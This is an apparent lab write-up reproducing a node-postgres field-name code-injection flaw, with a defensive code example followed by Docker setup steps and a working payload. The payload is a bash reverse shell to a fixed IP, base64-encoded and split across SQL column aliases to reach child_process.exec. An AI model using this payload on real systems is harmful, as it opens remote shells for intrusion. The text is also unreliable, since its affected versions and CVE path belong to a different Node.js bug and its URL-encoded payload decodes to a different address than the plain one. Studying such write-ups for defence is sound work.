Vulnerability description
When node-postgres handles a Row Description message returned by PostgreSQL, it splices the field names into generated JavaScript code. Because the names are not properly escaped, a specially crafted field name can break out of the single-quoted string in that code, resulting in code execution.
Affected versions:
Node.js 8.5.0 + Express 3.19.0-3.21.2
Node.js 8.5.0 + Express 4.11.0-4.15.5
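The root cause described above is a row parser generated with `new Function()` in which field names from the Row Description message are pasted into the source without escaping. The added example below (not node-postgres's own code) shows two ways to build the row object that never evaluate a field name as code; `FIELDS` is a constructed Row Description whose first name has the shape of the hostile field name used in the payload later in this writeup.

```javascript
// Constructed Row Description fields, as a server could send them.
// The first name is a breakout attempt of the kind shown in this writeup:
// it contains a backslash, a quote and a comment opener.
const FIELDS = [
  { name: "\\']=0;require=process.mainModule.constructor._load;/*" },
  { name: "id" },
  { name: "user name" },
];

// Safe variant 1: no code generation at all. Field names are only used as
// property keys, so their content cannot influence control flow.
function parseRowSafe(fields, values) {
  const row = {};
  for (let i = 0; i < fields.length; i++) {
    row[fields[i].name] = values[i];
  }
  return row;
}

// Safe variant 2: if a generated parser is kept for speed, every field name
// must be emitted as a JSON string literal. JSON.stringify escapes quotes,
// backslashes and control characters, so the name cannot close the literal
// or start a comment outside of it.
function buildRowParserEscaped(fields) {
  let body = "var row = {};\n";
  for (let i = 0; i < fields.length; i++) {
    body += `row[${JSON.stringify(fields[i].name)}] = values[${i}];\n`;
  }
  body += "return row;";
  return new Function("values", body);
}

// Helper for tests and review: true when a field name contains a character
// that would terminate a single-quoted literal in naively generated code.
function nameNeedsEscaping(name) {
  return /['\\\r\n\u2028\u2029]/.test(name);
}

// Both variants treat the hostile name as an ordinary string key.
const parsed = buildRowParserEscaped(FIELDS)([1, 2, 3]);
console.log(Object.keys(parsed)); // the three names, unchanged, no code run
```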
Kali environment setup
Install the HTTPS transport, CA certificates and dirmngr:
apt-get update
apt-get install -y apt-transport-https ca-certificates
apt-get install dirmngr
Add the GPG key and the package source:
curl -fsSL https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/gpg | sudo apt-key add -
echo 'deb https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/ buster stable' | sudo tee /etc/apt/sources.list.d/docker.list
Update the package index and install Docker:
apt-get update && apt install docker-ce
Start the Docker service and install docker-compose:
service docker start
apt install docker-compose
Download vulhub:
git clone https://github.com/vulhub/vulhub.git
Reproducing the vulnerability
Start the environment from /vulhub-master/node/CVE-2017-14849:
docker-compose build
docker-compose up -d
Once initialization has finished, visit ip:port and capture the request.
Running sqlmap against the id=1 parameter confirms the SQL injection; the back-end DBMS is PostgreSQL.
Command to execute (PoC):
bash -i >& /dev/tcp/192.168.1.210/7896 0>&1
Base64-encoded:
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMjEwLzc4OTYgMD4mMQ==
Split across field names:
SELECT 1 AS "\']=0;require=process.mainModule.constructor._load;/*", 2 AS "*/p=require(`child_process`);/*", 3 AS "*/p.exec(`echo YmFzaCAtaSA+JiAvZGV2L3Rj`+/*", 4 AS "*/`cC8xOTIuMTY4LjEuMjEwLzc4OTYgMD4mMQ==|base64 -d|bash`)//"
URL-encoded:
SELECT%201%20AS%20%22%5C'%5D=0;require=process.mainModule.constructor._load;/*%22,%202%20AS%20%22*/p=require(%60child_process%60);/*%22,%203%20AS%20%22*/p.exec(%60echo%20YmFzaCAtaSA+JiAvZGV2L3Rj%60+/*%22,%204%20AS%20%22*/%60cC8xOTIuMTY4LjIuMTMwLzk5OTkgMD4mMQ==%7Cbase64%20-d%7Cbash%60)//%22
Reverse shell
References
https://blog.csdn.net/gaomei2009/article/details/125910094
https://security.tencent.com/index.php/blog/msg/121